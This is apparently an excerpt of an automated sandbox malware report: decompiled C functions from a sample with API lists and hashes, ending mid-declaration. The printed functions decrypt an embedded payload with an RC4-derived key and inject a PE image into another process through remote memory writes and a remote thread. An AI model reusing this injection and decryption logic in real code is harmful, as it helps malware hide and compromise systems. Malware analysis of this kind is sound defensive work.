                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1e9d92f0c14906e5e78f2ccaa06530f67dbc96f1056fd7f083bd70212eac788c
                                                                                                                                                                                                                                                                                          • Instruction ID: ce02bb0423f1ed4ff3e0cabb146a2299b7acf876235963d661c533819ff09b0e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e9d92f0c14906e5e78f2ccaa06530f67dbc96f1056fd7f083bd70212eac788c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7C04C7655430CAB8B04DF98E884EAB37EDBB8C650B048548BA1D87200C630F9108BA4
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                          			E04008CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				long* _v24;
                                                                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                                                                                                          				long** _t35;
                                                                                                                                                                                                                                                                                          				char* _t52;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t31 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                                                                                                                                                                                                                                                                          					if(_t32 == 0) {
                                                                                                                                                                                                                                                                                          						_t32 = GetLastError();
                                                                                                                                                                                                                                                                                          						_v16 = _t32;
                                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                          							_t52 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                                          						if(_t32 != 0) {
                                                                                                                                                                                                                                                                                          							_t34 = _a16;
                                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v20, _a12, _t34, 0);
                                                                                                                                                                                                                                                                                          							if(_t34 != 0) {
                                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                                          								_t35 =  &_v24;
                                                                                                                                                                                                                                                                                          								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
                                                                                                                                                                                                                                                                                          								if(_t35 != 0) {
                                                                                                                                                                                                                                                                                          									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                                          									CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x04008cf6
                                                                                                                                                                                                                                                                                          0x04008d01
                                                                                                                                                                                                                                                                                          0x04008e1a
                                                                                                                                                                                                                                                                                          0x04008e20
                                                                                                                                                                                                                                                                                          0x04008d25
                                                                                                                                                                                                                                                                                          0x04008d25
                                                                                                                                                                                                                                                                                          0x04008d35
                                                                                                                                                                                                                                                                                          0x04008d3f
                                                                                                                                                                                                                                                                                          0x04008d47
                                                                                                                                                                                                                                                                                          0x04008d49
                                                                                                                                                                                                                                                                                          0x04008d4f
                                                                                                                                                                                                                                                                                          0x04008d59
                                                                                                                                                                                                                                                                                          0x04008d6d
                                                                                                                                                                                                                                                                                          0x04008d78
                                                                                                                                                                                                                                                                                          0x04008d78
                                                                                                                                                                                                                                                                                          0x04008d59
                                                                                                                                                                                                                                                                                          0x04008d82
                                                                                                                                                                                                                                                                                          0x04008d99
                                                                                                                                                                                                                                                                                          0x04008da1
                                                                                                                                                                                                                                                                                          0x04008da5
                                                                                                                                                                                                                                                                                          0x04008db1
                                                                                                                                                                                                                                                                                          0x04008db9
                                                                                                                                                                                                                                                                                          0x04008dbb
                                                                                                                                                                                                                                                                                          0x04008dc2
                                                                                                                                                                                                                                                                                          0x04008dd5
                                                                                                                                                                                                                                                                                          0x04008ddd
                                                                                                                                                                                                                                                                                          0x04008df7
                                                                                                                                                                                                                                                                                          0x04008dfe
                                                                                                                                                                                                                                                                                          0x04008dfe
                                                                                                                                                                                                                                                                                          0x04008ddd
                                                                                                                                                                                                                                                                                          0x04008e08
                                                                                                                                                                                                                                                                                          0x04008e08
                                                                                                                                                                                                                                                                                          0x04008e14
                                                                                                                                                                                                                                                                                          0x04008e14
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04008d82

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008D3F
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008D49
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008D78
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008D99
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008DB1
                                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 04008DD5
                                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008DF1
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008DFE
                                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04008E08
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008E14
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D30
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D68
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                                          • Instruction ID: a60922051ccac58686ce7bb6d252e90d8c3d4a9338f0118c5879c090c3d284f0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5311B75A44209EBFB58DFA4C849BAE77B9FB44704F10C628F601B61C0D7B8A984CF60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04002510(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                                          					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                          					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                                          					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                                                                                                          							E04007B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                                          							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                                          							_v36 = 0;
                                                                                                                                                                                                                                                                                          							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                          								E04007B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                                          								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                                          								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							E040026D0(_v16, _v32);
                                                                                                                                                                                                                                                                                          							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
                                                                                                                                                                                                                                                                                          								VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                          								_v28 = 0;
                                                                                                                                                                                                                                                                                          								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
                                                                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x04002516
                                                                                                                                                                                                                                                                                          0x04002521
                                                                                                                                                                                                                                                                                          0x040026c2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002531
                                                                                                                                                                                                                                                                                          0x0400253a
                                                                                                                                                                                                                                                                                          0x0400254b
                                                                                                                                                                                                                                                                                          0x04002554
                                                                                                                                                                                                                                                                                          0x0400256a
                                                                                                                                                                                                                                                                                          0x04002571
                                                                                                                                                                                                                                                                                          0x04002596
                                                                                                                                                                                                                                                                                          0x0400259d
                                                                                                                                                                                                                                                                                          0x040025d7
                                                                                                                                                                                                                                                                                          0x040025e6
                                                                                                                                                                                                                                                                                          0x040025eb
                                                                                                                                                                                                                                                                                          0x040025ee
                                                                                                                                                                                                                                                                                          0x04002600
                                                                                                                                                                                                                                                                                          0x0400263c
                                                                                                                                                                                                                                                                                          0x04002641
                                                                                                                                                                                                                                                                                          0x040025fd
                                                                                                                                                                                                                                                                                          0x040025fd
                                                                                                                                                                                                                                                                                          0x0400264e
                                                                                                                                                                                                                                                                                          0x04002670
                                                                                                                                                                                                                                                                                          0x04002692
                                                                                                                                                                                                                                                                                          0x04002698
                                                                                                                                                                                                                                                                                          0x040026bf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040026bf
                                                                                                                                                                                                                                                                                          0x0400267d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002683
                                                                                                                                                                                                                                                                                          0x040025b6
                                                                                                                                                                                                                                                                                          0x040025bd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040025ca
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040025d0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002573

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 04002564
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 04002590
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 040025B0
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040025CA
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                                          • Instruction ID: c64b90f60543cdd9f1b152a56a7e8b33ad9649d5cc2119a14d9a029aa2c63625
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0510D75E00209AFEB18DF94C895FAEB7B5FB48305F10C558E615BB280D778A981CB64
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                                          			E008159E6(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v0;
                                                                                                                                                                                                                                                                                          				void* _v804;
                                                                                                                                                                                                                                                                                          				intOrPtr _v808;
                                                                                                                                                                                                                                                                                          				intOrPtr _v812;
                                                                                                                                                                                                                                                                                          				intOrPtr _t6;
                                                                                                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                                                                                                                                          				intOrPtr _t13;
                                                                                                                                                                                                                                                                                          				long _t17;
                                                                                                                                                                                                                                                                                          				intOrPtr _t21;
                                                                                                                                                                                                                                                                                          				intOrPtr _t22;
                                                                                                                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t31;
                                                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                                                                                                                          				_t22 = __ecx;
                                                                                                                                                                                                                                                                                          				_t21 = __ebx;
                                                                                                                                                                                                                                                                                          				_t6 = __eax;
                                                                                                                                                                                                                                                                                          				_t34 = _t22 -  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				if(_t34 == 0) {
                                                                                                                                                                                                                                                                                          					asm("repe ret");
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *0x880db8 = _t6;
                                                                                                                                                                                                                                                                                          				 *0x880db4 = _t22;
                                                                                                                                                                                                                                                                                          				 *0x880db0 = _t25;
                                                                                                                                                                                                                                                                                          				 *0x880dac = _t21;
                                                                                                                                                                                                                                                                                          				 *0x880da8 = _t27;
                                                                                                                                                                                                                                                                                          				 *0x880da4 = _t26;
                                                                                                                                                                                                                                                                                          				 *0x880dd0 = ss;
                                                                                                                                                                                                                                                                                          				 *0x880dc4 = cs;
                                                                                                                                                                                                                                                                                          				 *0x880da0 = ds;
                                                                                                                                                                                                                                                                                          				 *0x880d9c = es;
                                                                                                                                                                                                                                                                                          				 *0x880d98 = fs;
                                                                                                                                                                                                                                                                                          				 *0x880d94 = gs;
                                                                                                                                                                                                                                                                                          				asm("pushfd");
                                                                                                                                                                                                                                                                                          				_pop( *0x880dc8);
                                                                                                                                                                                                                                                                                          				 *0x880dbc =  *_t31;
                                                                                                                                                                                                                                                                                          				 *0x880dc0 = _v0;
                                                                                                                                                                                                                                                                                          				 *0x880dcc =  &_a4;
                                                                                                                                                                                                                                                                                          				 *0x880d08 = 0x10001;
                                                                                                                                                                                                                                                                                          				_t11 =  *0x880dc0; // 0x0
                                                                                                                                                                                                                                                                                          				 *0x880cbc = _t11;
                                                                                                                                                                                                                                                                                          				 *0x880cb0 = 0xc0000409;
                                                                                                                                                                                                                                                                                          				 *0x880cb4 = 1;
                                                                                                                                                                                                                                                                                          				_t12 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v812 = _t12;
                                                                                                                                                                                                                                                                                          				_t13 =  *0x869064; // 0x2581daee
                                                                                                                                                                                                                                                                                          				_v808 = _t13;
                                                                                                                                                                                                                                                                                          				 *0x880d00 = IsDebuggerPresent();
                                                                                                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                                                                                                          				E0081A4FC(_t14);
                                                                                                                                                                                                                                                                                          				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                                                                          				_t17 = UnhandledExceptionFilter(0x820570);
                                                                                                                                                                                                                                                                                          				if( *0x880d00 == 0) {
                                                                                                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                                                                                                          					E0081A4FC(_t17);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x008159e6
                                                                                                                                                                                                                                                                                          0x008159e6
                                                                                                                                                                                                                                                                                          0x008159e6
                                                                                                                                                                                                                                                                                          0x008159e6
                                                                                                                                                                                                                                                                                          0x008159e6
                                                                                                                                                                                                                                                                                          0x008159e6
                                                                                                                                                                                                                                                                                          0x008159e6
                                                                                                                                                                                                                                                                                          0x008159ec
                                                                                                                                                                                                                                                                                          0x008159ee
                                                                                                                                                                                                                                                                                          0x008159ee
                                                                                                                                                                                                                                                                                          0x008168a5
                                                                                                                                                                                                                                                                                          0x008168aa
                                                                                                                                                                                                                                                                                          0x008168b0
                                                                                                                                                                                                                                                                                          0x008168b6
                                                                                                                                                                                                                                                                                          0x008168bc
                                                                                                                                                                                                                                                                                          0x008168c2
                                                                                                                                                                                                                                                                                          0x008168c8
                                                                                                                                                                                                                                                                                          0x008168cf
                                                                                                                                                                                                                                                                                          0x008168d6
                                                                                                                                                                                                                                                                                          0x008168dd
                                                                                                                                                                                                                                                                                          0x008168e4
                                                                                                                                                                                                                                                                                          0x008168eb
                                                                                                                                                                                                                                                                                          0x008168f2
                                                                                                                                                                                                                                                                                          0x008168f3
                                                                                                                                                                                                                                                                                          0x008168fc
                                                                                                                                                                                                                                                                                          0x00816904
                                                                                                                                                                                                                                                                                          0x0081690c
                                                                                                                                                                                                                                                                                          0x00816917
                                                                                                                                                                                                                                                                                          0x00816921
                                                                                                                                                                                                                                                                                          0x00816926
                                                                                                                                                                                                                                                                                          0x0081692b
                                                                                                                                                                                                                                                                                          0x00816935
                                                                                                                                                                                                                                                                                          0x0081693f
                                                                                                                                                                                                                                                                                          0x00816944
                                                                                                                                                                                                                                                                                          0x0081694a
                                                                                                                                                                                                                                                                                          0x0081694f
                                                                                                                                                                                                                                                                                          0x0081695b
                                                                                                                                                                                                                                                                                          0x00816960
                                                                                                                                                                                                                                                                                          0x00816962
                                                                                                                                                                                                                                                                                          0x0081696a
                                                                                                                                                                                                                                                                                          0x00816975
                                                                                                                                                                                                                                                                                          0x00816982
                                                                                                                                                                                                                                                                                          0x00816984
                                                                                                                                                                                                                                                                                          0x00816986
                                                                                                                                                                                                                                                                                          0x0081698b
                                                                                                                                                                                                                                                                                          0x0081699f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00816955
                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0081696A
                                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00820570), ref: 00816975
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00816991
                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00816998
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ad3638bcbc8f6f775050d88b99d197ed22eefe19fb2ff6890fec4b1232770051
                                                                                                                                                                                                                                                                                          • Instruction ID: 951992373586c5e0c02c1ff38ca70503d7d46c7d71c6d4f9c9367136ef5eae6b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad3638bcbc8f6f775050d88b99d197ed22eefe19fb2ff6890fec4b1232770051
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80219CB5805304DFD790DFADED49A947BB8FB48310F50921AE94896372E7B069898F06
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                          			E00813960(struct HBRUSH__* __ecx, struct HDC__* __edx, struct HDC__** _a4, int _a8, int _a12, int _a16, int _a20, struct HDC__* _a24, void* _a28) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                                          				int _v52;
                                                                                                                                                                                                                                                                                          				int _v56;
                                                                                                                                                                                                                                                                                          				struct tagBITMAPINFO _v60;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v76;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v80;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v84;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v88;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v92;
                                                                                                                                                                                                                                                                                          				struct HDC__** _v96;
                                                                                                                                                                                                                                                                                          				void* _v100;
                                                                                                                                                                                                                                                                                          				struct HBITMAP__* _v104;
                                                                                                                                                                                                                                                                                          				struct HBITMAP__* _v108;
                                                                                                                                                                                                                                                                                          				void* _v112;
                                                                                                                                                                                                                                                                                          				void* _v116;
                                                                                                                                                                                                                                                                                          				void* _v120;
                                                                                                                                                                                                                                                                                          				void* _v124;
                                                                                                                                                                                                                                                                                          				void* _v128;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _v132;
                                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t92;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                                                                                          				void* _t120;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t121;
                                                                                                                                                                                                                                                                                          				int _t141;
                                                                                                                                                                                                                                                                                          				int _t155;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t156;
                                                                                                                                                                                                                                                                                          				long _t178;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t194;
                                                                                                                                                                                                                                                                                          				struct HDC__** _t201;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t202;
                                                                                                                                                                                                                                                                                          				struct HDC__** _t203;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t204;
                                                                                                                                                                                                                                                                                          				void* _t205;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t206;
